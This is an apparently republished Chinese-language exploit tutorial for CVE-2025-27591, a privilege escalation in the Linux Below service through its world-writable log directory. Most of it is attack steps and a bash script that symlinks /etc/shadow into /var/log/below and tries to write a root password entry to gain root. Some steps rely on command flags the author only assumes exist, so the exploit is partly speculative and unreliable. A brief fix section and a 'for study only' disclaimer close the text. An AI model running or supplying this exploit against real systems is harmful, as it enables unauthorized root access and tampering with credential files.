CVE-2025-27591 是一个已知的权限提升漏洞,存在于 Below 服务(版本 < v0.9.0)。该漏洞源于 /var/log/below 目录被设置为全局可写(world-writable),允许本地非特权用户通过符号链接攻击修改敏感文件(如 /etc/shadow),从而提升至 root 权限。
漏洞利用原理
1.全局可写目录:/var/log/below 的权限为 777,任何用户都可写入。2.符号链接攻击:攻击者创建符号链接,将日志文件指向 /etc/shadow,Below 服务以 root 权限操作时会间接修改目标文件。3.权限提升:通过覆盖或修改 /etc/shadow 设置已知密码,实现 root 访问。
前提条件
•目标系统运行 Below < v0.9.0。•攻击者拥有本地非特权用户权限。•/var/log/below 目录全局可写(可用 ls -ld /var/log/below 检查)。
基本利用步骤
1.确认漏洞存在: ls -ld /var/log/below 输出如 drwxrwxrwx 表示目录可写。2.创建符号链接: ln -s /etc/shadow /var/log/below/attack.log3.触发服务写入: 假设 below 会向 attack.log 写入日志: below some_command 2>/var/log/below/attack.log4.验证提权: 如果 /etc/shadow 被修改,使用新密码登录: su -
方法 1:利用日志输出
假设 below 支持将输入或调试信息写入日志文件:
1.生成密码哈希: mkpasswd -m sha-512 "newpassword" 输出示例: $6$randomsalt$hashedpassword 构造完整条目: root:$6$randomsalt$hashedpassword:19448::::::2.创建符号链接: ln -sf /etc/shadow /var/log/below/attack.log3.尝试控制输出: 假设 below 支持调试模式并回显输入: below --debug "root:$6$randomsalt$hashedpassword:19448::::::" 2>/var/log/below/attack.log4.验证结果: grep "$hashedpassword" /etc/shadow && echo "成功!尝试密码 'newpassword'"
方法 2:分步注入
若无法一次性写入完整条目,可尝试追加方式:
1.准备目标内容: echo "root:$6$randomsalt$hashedpassword:19448::::::" > /tmp/payload2.利用追加模式: 假设 below 支持日志追加: below some_command --log-append /tmp/payload 2>>/var/log/below/attack.log3.清理多余数据: 若 /etc/shadow 格式被破坏,需在提权后修复。
示例脚本
#!/bin/bash# 生成密码哈希PASSWORD="newpassword"HASH=$(mkpasswd -m sha-512"$PASSWORD")PAYLOAD="root:$HASH:19448::::::"# 检查目录权限if["$(stat -c %A /var/log/below)"!="drwxrwxrwx"];thenecho "目录不可写,漏洞可能已修复"exit1fi# 创建符号链接ln -sf /etc/shadow /var/log/below/attack.log# 尝试写入echo "尝试写入: $PAYLOAD"below --debug "$PAYLOAD"2>/var/log/below/attack.log# 检查结果if grep -q "$HASH"/etc/shadow;thenecho "成功写入!尝试使用密码 '$PASSWORD' 登录"elseecho "写入失败,检查 below 的行为"fi
•修复情况:Below >= v0.9.0 已修复此漏洞。•设置目录权限:chmod 700 /var/log/below•升级 Below 至最新版本。
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):Linux提权漏洞CVE-2025-27591
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论